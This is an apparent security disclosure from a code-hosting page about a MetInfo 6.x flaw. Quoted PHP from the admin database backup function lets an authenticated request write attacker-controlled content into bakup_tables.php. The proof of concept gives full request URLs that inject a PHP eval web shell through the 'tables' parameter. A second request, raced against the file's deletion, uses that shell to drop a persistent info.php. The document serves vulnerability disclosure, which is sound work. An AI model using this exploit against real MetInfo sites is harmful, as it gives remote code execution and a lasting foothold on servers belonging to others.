Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

The MetInfo 6.x background getshell

Description: An issue was discovered in Metinfo 6.x.An attacker can use backend database backup function to get the web shell.

1.Technical Description:

locate in /app/system/databack/admin/index.class.php line:456 to 478:

  public function dogetsql($table='') {
        global $_M;
        if($_M['form']['tables'] && !$table)$table = $_M['form']['tables'];
        $localurl=$_M['config']['met_weburl'];
        $tablepre=$_M['config']['tablepre'];
        $fileid = isset($_M['form']['fileid']) ? $_M['form']['fileid'] : 1;
        if($table){
            $tables=$table;
        }else{
            $tables=$this->dotableprearray($tablepre);
        }
        
        $sizelimit=2048;
        
        if($fileid==1){
            $random = isset($_M['form']['random']) ? $_M['form']['random'] : met_rand(6);
            $this->docache_write('bakup_tables.php', $tables);
        }elseif(!$tbl){
            $random = isset($_M['form']['random']) ? $_M['form']['random'] : met_rand(6);
            $allidlist=explode('|',$tablestx);
            for($i=0;$i<count($allidlist)-1;$i++){
                $tables[$i]=$allidlist[$i];
            }
        } 

If we post a string type '$tables',the program will execute docache_write locate in line 334 to 351:

  function docache_write($file, $string, $type = 'array'){
  	    global $_M;
   	if(is_array($string))
   	{
   		$type = strtolower($type);
   		if($type == 'array')
   		{
   			$string = "<?php\n return ".var_export($string,TRUE).";\n?>";
   		}
   		elseif($type == 'constant')
   		{
   			$data='';
   			foreach($string as $key => $value) $data .= "define('".strtoupper($key)."','".addslashes($value)."');\n";
   			$string = "<?php\n".$data."\n?>";
   		}
   	}
   	file_put_contents(PATH_WEB.ADMIN_FILE.'/databack/'.$file, $string);
   }

It will create a file named 'bakup_tables.php' locate in /admin/databack/,and we can control the content. But in the end of the function dogetsql,the program will delete the tmpfile 'bakup_tables.php'.

	$this->docache_delete('bakup_tables.php', $tables);

So we need to use Race condition to get the code is executed

2.PoC

Use the Google Chrome open this test site.download the latest version( https://www.mituo.cn/upload/file/MetInfo6.1.3.zip)and build a test site. After the administrator logged in. image We use this url:

http://127.0.0.1/metinfo6.1.3/admin/index.php?n=databack&c=index&a=dogetsql&anyid=13&lang=cn&tables=<?php eval($_GET[2]);?>&fileid=1

image At the same time.We use Race condition.

http://127.0.0.1/metinfo6.1.3/admin/databack/bakup_tables.php?2=file_put_contents('info.php','<?php%20phpinfo();?>');

image Then we can get shell /admin/databack/info.php: image